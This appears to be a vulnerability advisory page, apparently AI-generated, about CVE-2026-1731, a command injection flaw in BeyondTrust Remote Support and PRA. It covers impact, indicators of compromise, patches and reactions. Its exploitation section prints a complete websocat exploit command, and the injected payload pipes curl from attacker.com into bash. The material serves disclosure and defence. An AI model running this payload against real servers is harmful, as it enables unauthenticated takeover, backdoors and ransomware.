CVE-2026-1731
BeyondTrust Privileged Remote Access Client Analyse et atténuation des vulnérabilités

Aperçu

CVE-2026-1731 is a critical pre-authentication OS command injection vulnerability in BeyondTrust Remote Support (RS) and certain older versions of Privileged Remote Access (PRA). An unauthenticated remote attacker can execute arbitrary operating system commands in the context of the site user by sending specially crafted WebSocket requests. The vulnerability was published on February 6, 2026, with patches released February 17, 2026. Affected versions include BeyondTrust Remote Support prior to 25.3.2 and Privileged Remote Access prior to 25.1. It carries a CVSS v3.1 base score of 9.8 (Critical) and a CVSS v4.0 base score of 9.9 (Critical) (BeyondTrust Advisory, CISA KEV).

Détails techniques

The vulnerability is classified as CWE-78 (Improper Neutralization of Special Elements used in an OS Command). The root cause lies in the server-side thin-scc-wrapper script, which performs arithmetic comparisons on attacker-controlled input — specifically the remoteVersion value transmitted during a WebSocket handshake on the /nw endpoint. Bash treats operands in numeric comparisons as expressions rather than plain strings, allowing crafted payloads such as a[$(cmd)]0 to trigger arbitrary command execution during evaluation. Although BeyondTrust added a numeric sanity check in this patch cycle, it does not prevent Bash from performing expression evaluation, leaving the endpoint exploitable. This vulnerability is a variant of CVE-2024-12356, which was previously exploited by the Silk Typhoon threat actor against the U.S. Treasury Department, sharing the same WebSocket endpoint but targeting a different code path. No authentication or user interaction is required, and attack complexity is low (GitHub PoC, GreyNoise).

Impact

Successful exploitation allows unauthenticated remote attackers to execute arbitrary OS commands with site user privileges, resulting in full confidentiality, integrity, and availability compromise of the affected system. Observed real-world attacks have led to full Active Directory domain control, deployment of web shells and backdoors, data exfiltration, and installation of remote access trojans including SparkRAT, VShell, and Lumma Stealer. Because BeyondTrust products are privileged access management tools by design, compromise provides attackers with broad lateral movement capabilities across enterprise networks, including access to all systems managed through the BeyondTrust platform. Ransomware gangs have also weaponized this vulnerability, with healthcare and critical infrastructure sectors among the confirmed targets (CISA KEV, Unit 42, BleepingComputer).

Étapes d’exploitation

  1. Reconnaissance: Use Shodan, Censys, or FOFA to identify internet-facing BeyondTrust Remote Support or PRA instances running versions prior to RS 25.3.2 or PRA 25.1. Target the /nw WebSocket endpoint on port 443 or non-standard ports.
  2. Establish WebSocket connection: Open a WebSocket connection to the target's /nw endpoint using a tool such as websocat, specifying the protocol header ingredi support desk customer thin and the X-Ns-Company header with the target company name.
  3. Inject malicious payload: Send a crafted remoteVersion value containing a Bash arithmetic injection payload, such as hax[$(ATTACKER-COMMAND)] followed by a UUID and other required fields. Example payload structure:
echo -ne "hax[\$(curl http://attacker.com/shell.sh|bash)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | \
./websocat -k wss://TARGET:443/nw \
--protocol "ingredi support desk customer thin" \
-H "X-Ns-Company: COMPANY-NAME" \
--binary -n -
  1. Achieve code execution: The thin-scc-wrapper script evaluates the injected expression during Bash arithmetic comparison, executing the embedded command as the site user without any authentication.
  2. Post-exploitation: Deploy persistent backdoors (VShell, SparkRAT), establish web shells, exfiltrate credentials, or pivot to Active Directory for domain-wide compromise. Ransomware operators have used this access to deploy ransomware payloads across the network (GitHub PoC, GreyNoise, Unit 42).

Indicateurs de compromis

  • Network: Unusual WebSocket connections to /nw endpoint on BeyondTrust servers from external IPs; outbound connections from BeyondTrust processes to unknown IPs or OAST callback domains; scanning activity targeting port 443 and non-standard ports with ingredi support desk customer thin WebSocket protocol header; JA4+ fingerprints matching known scanner tooling (5-header or 7-header lightweight exploit tools).
  • Process: Unexpected child processes spawned by the BeyondTrust service (e.g., curl, wget, bash, python, sh); execution of thin-scc-wrapper with anomalous arguments containing special characters like $(), [].
  • File System: Presence of VShell, SparkRAT, or Lumma Stealer binaries in BeyondTrust installation directories or temp folders; new web shell files (.php, .jsp, .aspx) in web-accessible directories; unexpected cron jobs or scheduled tasks created by the BeyondTrust service account.
  • Logs: BeyondTrust access logs showing WebSocket connections with malformed or unusually long remoteVersion values; authentication logs showing new privileged accounts created post-exploitation; Active Directory logs showing unexpected domain admin account creation or group membership changes.
  • Malware Hashes/Indicators: SparkRAT, VShell, and Lumma Stealer samples associated with this campaign (refer to Unit 42 and Arctic Wolf threat intelligence reports for specific hashes) (GreyNoise, Unit 42, Arctic Wolf).

Atténuation et solutions de contournement

BeyondTrust released patches on February 17, 2026. Organizations should immediately upgrade BeyondTrust Remote Support to version 25.3.2 or later, and Privileged Remote Access to version 25.1 or later. BeyondTrust cloud-hosted customers were automatically patched on February 2, 2026. CISA mandated that federal agencies apply mitigations within three days of the KEV listing (due February 16, 2026). As interim measures, restrict network access to BeyondTrust instances to trusted IP ranges only, implement network segmentation to limit exposure, and monitor for suspicious outbound connections and anomalous process execution from BeyondTrust services. If immediate patching is not possible, consider taking affected BeyondTrust instances offline until patching is completed. Organizations should also check for signs of prior compromise, including reviewing logs for WebSocket connections with anomalous remoteVersion values (BeyondTrust Advisory, CISA KEV).

Réactions de la communauté

BeyondTrust issued security advisory BT26-02 and patched cloud customers automatically before public disclosure. CISA issued an emergency directive mandating federal agencies patch within three days, reflecting the severity and active exploitation status. Arctic Wolf published a threat campaign update documenting active exploitation following PoC release, and Unit 42 (Palo Alto Networks) published detailed analysis linking exploitation to VShell and SparkRAT deployments. GreyNoise documented reconnaissance activity beginning within 24 hours of PoC publication, noting that the same WebSocket endpoint was previously exploited by Silk Typhoon in the U.S. Treasury breach. Intel 471 published research noting the vulnerability was discovered through AI-assisted analysis, sparking community discussion about AI-driven vulnerability research. The security community on Reddit (r/sysadmin, r/blueteamsec) and social media platforms reacted with urgency given BeyondTrust's role as a privileged access management tool, with many practitioners noting the irony of a PAM tool being the attack vector. Microsoft later linked Storm-1175 (a China-nexus threat actor) to exploitation of this vulnerability in Medusa ransomware operations (GreyNoise, Arctic Wolf, Intel 471, Microsoft Blog).

Ressources additionnelles


SourceCe rapport a été généré à l’aide de l’IA

Apparenté BeyondTrust Privileged Remote Access Client Vulnérabilités:

Identifiant CVE

Sévérité

Score

Technologies

Nom du composant

Exploit CISA KEV

A corrigé

Date de publication

CVE-2026-1731CRITICAL9.9
  • BeyondTrust Privileged Remote Access Client logoBeyondTrust Privileged Remote Access Client
  • cpe:2.3:a:beyondtrust:privileged_remote_access
OuiOuiFeb 06, 2026
CVE-2026-40139CRITICAL9.2
  • BeyondTrust Privileged Remote Access Client logoBeyondTrust Privileged Remote Access Client
  • cpe:2.3:a:beyondtrust:privileged_remote_access
NonOuiJul 06, 2026
CVE-2026-40138CRITICAL9.2
  • BeyondTrust Privileged Remote Access Client logoBeyondTrust Privileged Remote Access Client
  • cpe:2.3:a:beyondtrust:privileged_remote_access
NonOuiJul 06, 2026
CVE-2026-40140HIGH8.7
  • BeyondTrust Privileged Remote Access Client logoBeyondTrust Privileged Remote Access Client
  • cpe:2.3:a:beyondtrust:remote_support
NonOuiJul 06, 2026
CVE-2026-40141HIGH8.5
  • BeyondTrust Privileged Remote Access Client logoBeyondTrust Privileged Remote Access Client
  • cpe:2.3:a:beyondtrust:privileged_remote_access
NonOuiJul 06, 2026

Évaluation gratuite des vulnérabilités

Évaluez votre posture de sécurité dans le cloud

Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.

Demander une évaluation

Obtenez une démo personnalisée

Prêt(e) à voir Wiz en action ?

"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
David EstlickRSSI
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
Adam FletcherChef du service de sécurité
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."
Greg PoniatowskiResponsable de la gestion des menaces et des vulnérabilités